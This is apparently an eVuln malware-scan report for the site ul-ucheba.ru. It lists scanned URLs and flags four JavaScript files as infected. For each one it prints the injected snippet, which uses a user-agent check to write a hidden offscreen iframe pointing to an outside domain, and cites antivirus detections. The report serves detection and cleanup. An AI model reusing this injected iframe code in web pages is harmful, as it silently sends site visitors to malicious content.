Malware Scanner report for ul-ucheba.ru

Malicious/Suspicious/Total urls checked: 4/0/15

4 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/7

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.ul-ucheba.ru/	200 OK Content-Length: 69919 Content-Type: text/html	clean
http://www.ul-ucheba.ru/media/system/js/mootools-core.js	200 OK Content-Length: 96962 Content-Type: application/javascript	clean
http://www.ul-ucheba.ru/media/system/js/core.js	200 OK Content-Length: 5384 Content-Type: application/javascript	clean
http://www.ul-ucheba.ru/media/system/js/caption.js	200 OK Content-Length: 1329 Content-Type: application/javascript	clean
http://www.ul-ucheba.ru/media/system/js/mootools-more.js	200 OK Content-Length: 238931 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() { var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 \|\| dude.indexOf("Chrome") > -1 \|\| dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk ... 3092 bytes are skipped ...¿®æ¹å©åæ¥æä¸çä¸åï¼ä»¥ç¢ºä¿å®åå¨åä¸æä»½ã ",creditcard:"æ¨è¼¸å¥çä¿¡ç¨å¡èç¢¼ä¸æ£ç¢ºãç¶åå·²è¼¸å¥{length}ååç¬¦ã "}); Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)\|\|(/^ï¿¥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})(\.[0-9]{0,2})?\|[1-9]{1}\d(\.[0-9]{0,2})?\|0(\.[0-9]{0,2})?\|(\.[0-9]{1,2})?)$/).test(a.get("value")); }}); Antivirus reports: Sophos Troj/JSRedir-OI
http://www.ul-ucheba.ru/modules/mod_zstagcloud/js/swfobject.js	200 OK Content-Length: 10359 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() { var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 \|\| dude.indexOf("Chrome") > -1 \|\| dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk ... 3217 bytes are skipped ...},addDomLoadEvent:f,addLoadEvent:R,getQueryParamValue:function(v){var u=K.location.search\|\|K.location.hash;if(v==null){return g(u)}if(u){var t=u.substring(1).split("&");for(var r=0;r<t.length;r++){if(t[r].substring(0,t[r].indexOf("="))==v){return g(t[r].substring((t[r].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(A&&M){var q=C(m);if(q){q.parentNode.replaceChild(M,q);if(l){W(l,true);if(h.ie&&h.win){M.style.display="block"}}M=null;l=null;A=false}}}}}(); Antivirus reports: F-Prot JS/IFrame.RS Sophos Troj/JSRedir-OI Commtouch JS/IFrame.RS
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js	200 OK Content-Length: 91668 Content-Type: text/javascript	clean
http://www.ul-ucheba.ru/modules/mod_fpss/includes/js/jquery.fpss.js	200 OK Content-Length: 5499 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() { var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 \|\| dude.indexOf("Chrome") > -1 \|\| dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk ... 3068 bytes are skipped ...ton\|previousButton\|Array\|parseInt\|browser\|slideRight\|slideLeft\|slideUp\|auto\|outerHeight\|outerWidth\|remove\|href\|toggleClass\|carousel\|return\|undefined\|data\|extend\|1000\|6000\|300\|Play\|Pause\|control\|slidetext\|fpssTimer\|background\|msie\|body\|fpssIsIE\|version\|carouselVertical\|relative\|px\|textEffectSlideRight\|textEffectSlideDown\|textEffectSlideLeft\|right\|bottom\|mouseover\|window\|location\|attr\|loading\|delay\|fadeOut\|89\|90\|setInterval\|100\|linear\|400\|scrollTop\|typeof\|clearInterval\|fn\|jQuery'.split('\|'),0,{})) Antivirus reports: Sophos Troj/JSRedir-OI
http://ul-ucheba.ru/modules/mod_highlighter_gk4/interface/scripts/engine.js	200 OK Content-Length: 6828 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() { var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 \|\| dude.indexOf("Chrome") > -1 \|\| dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk ... 3371 bytes are skipped ... timerFunc: function() { var $this = this; if($this.mouseIsOver == false) { $this.effects1[$this.actual].start('opacity', 0); $this.effects2[$this.actual].start('top', 0,-24); $this.actual++; if($this.actual > $this.items.length-1) $this.actual = 0; $this.effects1[$this.actual].start('opacity', 1); $this.effects2[$this.actual].start('top', 24,0); } } }); GKNewsHighligher.implement(new Options); Antivirus reports: Sophos Troj/JSRedir-OI
http://www.ul-ucheba.ru/index.php	200 OK Content-Length: 69928 Content-Type: text/html	clean
http://www.ul-ucheba.ru/news	200 OK Content-Length: 45135 Content-Type: text/html	clean
http://www.ul-ucheba.ru/colleges	200 OK Content-Length: 46944 Content-Type: text/html	clean
http://www.ul-ucheba.ru/language-courses	200 OK Content-Length: 45199 Content-Type: text/html	clean
http://www.ul-ucheba.ru/all-questions	200 OK Content-Length: 48148 Content-Type: text/html	clean
http://www.ul-ucheba.ru/law-questions	200 OK Content-Length: 44264 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ul-ucheba.ru

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: ul-ucheba.ru
Referer: http://www.google.com/search?q=ul-ucheba.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ul-ucheba.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://ul-ucheba.ru/

Result: ul-ucheba.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for ul-ucheba.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools